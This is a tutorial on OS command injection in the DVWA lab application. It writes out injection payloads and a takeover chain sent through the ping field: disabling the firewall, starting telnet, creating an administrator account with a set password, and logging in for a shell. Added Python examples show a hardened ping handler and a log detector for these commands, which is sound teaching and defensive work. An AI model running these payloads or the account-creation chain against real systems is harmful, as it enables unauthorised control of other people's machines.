Today I will be showing how to hack a website through a command execution vulnerability. We will see this on DVWA (Damn Vulnerable Web Application).
What is Command Execution?
OS command injection is a technique for executing operating system commands on a web server through its web interface.
The user supplies operating system commands in a field the web application passes to the OS. Any web interface that does not properly sanitize its input is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords.
*** In the previous article I wrote how to access the DVWA that is installed on the XP machine from BackTrack.
Practical:
1. Take the XP machine and the BackTrack machine.
2. Enter the IP of the XP machine followed by the DVWA path:
http://192.168.25.54/dvwa
DVWA will open; go to Command Execution.
3. The DVWA page asks you to enter an IP to ping,
so enter 127.0.0.1 (your IP).
It pings, so that's cool.
4. Now try to execute the dir command.
boom.......
You get an error. What's the problem?
It only allows you to execute the ping command, nothing else. Then
how do we bypass this?
We can bypass it by using the && or | (pipe) symbol.
5. Now let's try one of these commands:
127.0.0.1 && dir (or)
127.0.0.1 | dir (or)
| dir
The last one means just the pipe and the command.
OK, it's executed. Now try to find the IP of the remote system:
127.0.0.1 | ifconfig
Now if you want to list the files in the system32 directory:
127.0.0.1 && cd ../../../../../windows/system32 & dir
Now you can access whatever files you require from the system.
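To show what is going on behind steps 4 and 5 from the defender's side, here is an added Python example (not code from the post or from DVWA itself). It rebuilds the ping form's back end two ways: the vulnerable pattern that glues the user value into one shell command string, and a hardened version that allow-lists a single IP address and runs ping without a shell. The sample inputs are the post's own payloads; the `ping -c 1` prefix, the separator model and the function names are assumptions for the example.

```python
import ipaddress
import platform
import re
import subprocess

# Constructed inputs for the demo: the normal value, then the bypass payloads
# typed into the DVWA ping form in the post.
SAMPLE_INPUTS = ["127.0.0.1", "127.0.0.1 && dir", "127.0.0.1 | dir", "| dir"]

# Rough model of a shell's control operators; enough to show how one line
# becomes several commands. Order matters: "||" and "&&" before "|" and "&".
SHELL_SEPARATORS = re.compile(r"\|\||&&|\||;|&")


def build_ping_command_vulnerable(target: str) -> str:
    """Vulnerable pattern (assumed; it mirrors the behaviour the post relies on):
    the user value is concatenated into one string that a shell interprets.
    Everything after && or | is a second command for that shell."""
    return "ping -c 1 " + target


def commands_shell_would_run(command_line: str) -> list:
    """Split a command line on control operators the way a shell would.
    '| dir' leaves ping with no target and a live 'dir' part, which is why
    'just the pipe and the command' works in the post."""
    return [part.strip() for part in SHELL_SEPARATORS.split(command_line)]


def validate_ip(target: str) -> str:
    """Allow-list check: the value must parse as exactly one IP address.
    Spaces, extra words and shell metacharacters all fail to parse."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError as exc:
        raise ValueError(f"not an IP address: {target!r}") from exc


def build_ping_argv(target: str) -> list:
    """Hardened version: validate, then build an argv list so no shell is
    involved. The address travels as one argument, so '|' and '&&' would be
    plain characters to ping (and the validator rejects them before that)."""
    ip = validate_ip(target)
    count_flag = "-n" if platform.system() == "Windows" else "-c"
    return ["ping", count_flag, "1", ip]


def run_ping(target: str) -> subprocess.CompletedProcess:
    """Run the hardened command with shell=False (the subprocess default)."""
    return subprocess.run(build_ping_argv(target), capture_output=True, text=True, check=False)


def classify(target: str) -> str:
    """'accepted' if the hardened handler would ping it, else 'rejected'."""
    try:
        validate_ip(target)
        return "accepted"
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    for value in SAMPLE_INPUTS:
        shell_view = commands_shell_would_run(build_ping_command_vulnerable(value))
        print(f"{value!r:22} vulnerable shell runs {shell_view}  hardened: {classify(value)}")
```

The point of the two builders side by side: the fix is not a blacklist of characters but an allow-list of what a ping target can be, plus never handing the value to a shell at all. DVWA's higher security levels move in the same direction; this example is a generic version of that idea, not DVWA's own code.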
What else can we do with Command Execution?
Normally I am executing commands like this:
| dir
But after this I want to take a shell of the remote computer. There are different ways; I am showing one.
1. First I disabled the firewall by executing Windows commands.
To disable the Windows XP firewall:
netsh firewall set opmode disable
In your command execution field type "| netsh firewall set opmode disable" (without quotes).
To enable the Windows XP firewall:
netsh firewall set opmode enable
2. After that I want to start a service that is helpful for me, so I started the TELNET service with the following commands.
To start the TELNET service from the command prompt:
sc config tlntsvr start= auto (hit Enter)
net start telnet
In your command execution field type "| sc config tlntsvr start= auto" (without quotes), then
| net start telnet
3. I want to access the remote PC with the help of Telnet, but it will ask for a login and password,
so I added one user from the command prompt only.
To add a new user from the command prompt:
net user /add user1 Ab12345
In your command execution field type "| net user /add user1 Ab12345" (without quotes).
4. Now I have a user, but it does not have privileges to access telnet, so I added this user to the Administrators group for admin privileges.
net localgroup administrators user1 /add
In your command execution field type "| net localgroup administrators user1 /add" (without quotes).
5. I started a terminal in BackTrack and tried to connect with telnet.
After that I am connected with telnet:
telnet 192.168.x.x
login: user1
password: Ab12345
Boooooooooooooooom...............
Got the shell of the remote computer:
c:\>
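From the detection side, the chain above (disable the firewall, enable telnet, add a user, put it in Administrators) leaves a clear trail whenever the ping parameter is logged. Here is an added Python example, not part of the post: it scans constructed proxy log lines that record the form body of the DVWA exec page, flags shell metacharacters in the ip value, and names each of the post-exploitation commands used above. The log format, the `body=` field, the parameter name `ip` and the timestamps are assumptions for the example.

```python
import re
from urllib.parse import parse_qs

# Constructed log lines, not real traffic. Assumed format: a reverse proxy in
# front of DVWA appends the POST body as body="..." to each access-log line.
# The ip values are the post's own inputs, URL-encoded as a browser sends them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2015:10:00:01 +0000] "POST /dvwa/vulnerabilities/exec/ HTTP/1.1" 200 body="ip=127.0.0.1&Submit=submit"
10.0.0.5 - - [01/Jan/2015:10:00:09 +0000] "POST /dvwa/vulnerabilities/exec/ HTTP/1.1" 200 body="ip=127.0.0.1+%26%26+dir&Submit=submit"
10.0.0.5 - - [01/Jan/2015:10:00:20 +0000] "POST /dvwa/vulnerabilities/exec/ HTTP/1.1" 200 body="ip=%7C+netsh+firewall+set+opmode+disable&Submit=submit"
10.0.0.5 - - [01/Jan/2015:10:00:31 +0000] "POST /dvwa/vulnerabilities/exec/ HTTP/1.1" 200 body="ip=%7C+net+user+%2Fadd+user1+Ab12345&Submit=submit"
10.0.0.5 - - [01/Jan/2015:10:00:40 +0000] "POST /dvwa/vulnerabilities/exec/ HTTP/1.1" 200 body="ip=%7C+net+localgroup+administrators+user1+%2Fadd&Submit=submit"
"""

BODY_RE = re.compile(r'body="(?P<body>[^"]*)"')

# A ping target never legitimately contains any of these.
METACHARS = re.compile(r"[|&;`$(){}<>\n]")

# The post-exploitation steps from the post, as (pattern, label). Each is a
# high-severity hit on its own; together they describe the whole chain.
POST_EXPLOIT = [
    (re.compile(r"netsh\s+firewall\s+set\s+opmode\s+disable", re.I), "firewall disabled"),
    (re.compile(r"sc\s+config\s+tlntsvr|net\s+start\s+telnet", re.I), "telnet service enabled"),
    (re.compile(r"net\s+user\b.*/add", re.I), "local user created"),
    (re.compile(r"net\s+localgroup\s+administrators\b.*/add", re.I), "user added to administrators"),
]


def extract_ip_param(line: str):
    """Return the decoded 'ip' form value from one log line, or None if the
    line carries no body. parse_qs does the %xx and '+' decoding."""
    match = BODY_RE.search(line)
    if not match:
        return None
    return parse_qs(match.group("body"), keep_blank_values=True).get("ip", [""])[0]


def findings_for(ip_value: str) -> list:
    """Classify a single ip value. Returns a list of (severity, label)."""
    findings = []
    if METACHARS.search(ip_value):
        findings.append(("medium", "shell metacharacter in ping target"))
    for pattern, label in POST_EXPLOIT:
        if pattern.search(ip_value):
            findings.append(("high", label))
    return findings


def analyze_log(text: str) -> list:
    """Scan every line; keep only the lines with at least one finding."""
    results = []
    for number, line in enumerate(text.splitlines(), start=1):
        ip_value = extract_ip_param(line)
        if ip_value is None:
            continue
        findings = findings_for(ip_value)
        if findings:
            results.append({"line": number, "ip": ip_value, "findings": findings})
    return results


if __name__ == "__main__":
    for hit in analyze_log(SAMPLE_LOG):
        print(f"line {hit['line']}: ip={hit['ip']!r}")
        for severity, label in hit["findings"]:
            print(f"    [{severity}] {label}")
```

The metacharacter rule alone catches step 5 of the practical section (the `&&` and `|` bypasses) before any damage is done; the command patterns add context so an analyst sees "firewall disabled, then a new local admin" rather than four separate odd-looking pings.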
1 comment:
Good information provided on the types of injection in an easy to understand language, very concise yet important. I am exploring OS command injection and will wait for more updates on that. Thank you.